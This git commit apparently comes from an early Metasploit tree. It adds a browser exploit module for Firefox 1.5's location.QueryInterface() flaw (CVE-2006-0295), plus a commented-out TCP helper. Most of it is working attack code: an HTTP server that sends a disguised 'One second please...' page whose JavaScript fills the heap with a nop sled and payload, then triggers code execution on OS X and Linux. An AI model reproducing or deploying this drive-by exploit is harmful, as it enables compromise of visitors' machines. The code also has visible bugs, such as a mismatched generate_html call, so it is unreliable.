More aux, first hack on multi-target firefox exploit
git-svn-id: file:///home/svn/incoming/trunk@3565 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
5411701d3f
commit
05bda2529a
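--- /dev/null
+++ b/lib/msf/core/auxiliary/remote/tcp.rb
@@ -0,0 +1,15 @@
+#module Msf
+#
+###
+#
+# This module provides methods for establish a connection to a remote host and
+# communicating with it.
+#
+###
+#module Auxiliary::Remote::Tcp
+#
+# include Exploit::Remote::Tcp
+#
+#end
+#end
+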
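--- /dev/null
+++ b/modules/exploits/multi/browser/firefox_queryinterface.rb
@@ -0,0 +1,140 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Multi::Browser::Firefox_QueryInterface < Msf::Exploit::Remote
+
+#
+# This module acts as an HTTP server
+#
+include Exploit::Remote::HttpServer
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Firefox location.QueryInterface() Code Execution (Mac OS X)',
+'Description' => %q{
+This module exploits a code execution vulnerability in the Mozilla
+Firefox browser. To reliably exploit this vulnerability, we need to fill
+almost a gigabyte of memory with our nop sled and payload. This module has
+been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
+
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'hdm',
+],
+'Version' => '$Revision$',
+'References' =>
+[
+['CVE', '2006-0295'],
+['BID', '16476'],
+['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
+],
+'Payload' =>
+{
+'Space' => 1000 + (rand(256).to_i * 4),
+'BadChars' => "\x00",
+},
+'Targets' =>
+[
+[ 'Firefox 1.5.0.0 Mac OS X',
+{
+'Platform' => 'osx',
+'Arch' => ARCH_PPC
+}
+],
+
+[ 'Firefox 1.5.0.0 Linux',
+{
+'Platform' => 'linux',
+'Arch' => ARCH_X86,
+}
+],
+],
+'DisclosureDate' => 'Feb 02 2006'
+))
+end
+
+def check_dependencies
+use_zlib
+end
+
+def on_request_uri(cli, request)
+
+# Re-generate the payload
+return if ((p = regenerate_payload(cli)) == nil)
+
+print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+# Transmit the response to the client
+send_response(cli, generate_html(p), { 'Content-Type' => 'text/html' })
+
+handler(cli)
+end
+
+def generate_html(payload, target)
+
+enc_code = unescape_encode(payload.encoded)
+enc_nops = unescape_encode(make_nops(4))
+
+return %Q|
+<html>
+<head>
+<title>One second please...</title>
+<script language="javascript">
+
+function BodyOnLoad() {
+h = FillHeap();
+location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
+};
+
+function FillHeap() {
+// Filler
+var m = "";
+var h = "";
+var a = 0;
+
+// Nop sled
+for(a=0; a<(1024*256); a++)
+m += unescape("#{enc_nops}");
+
+// Payload
+m += unescape("#{enc_code}");
+
+// Repeat
+for(a=0; a<1024; a++)
+h += m;
+
+// Return
+return h;
+}
+</script>
+</head>
+<body onload="BodyOnLoad()">
+</body>
+</html>
+|
+end
+
+def unescape_encode(data)
+data << "\x41" if (data % 2 != 0)
+dptr = 0
+buff = ''
+while (dptr < data.length)
+c1 = data[dptr]
+dptr += 1
+c2 = data[dptr]
+dptr += 1
+
+if (Rex::Arch.endian(target.arch) == ENDIAN_LITTLE)
+buff << sprintf('%%u%.2x%.2x', c2, c1)
+else
+buff << sprintf('%%u%.2x%.2x', c1, c2)
+end
+end
+return buff
+end
+
+end
+end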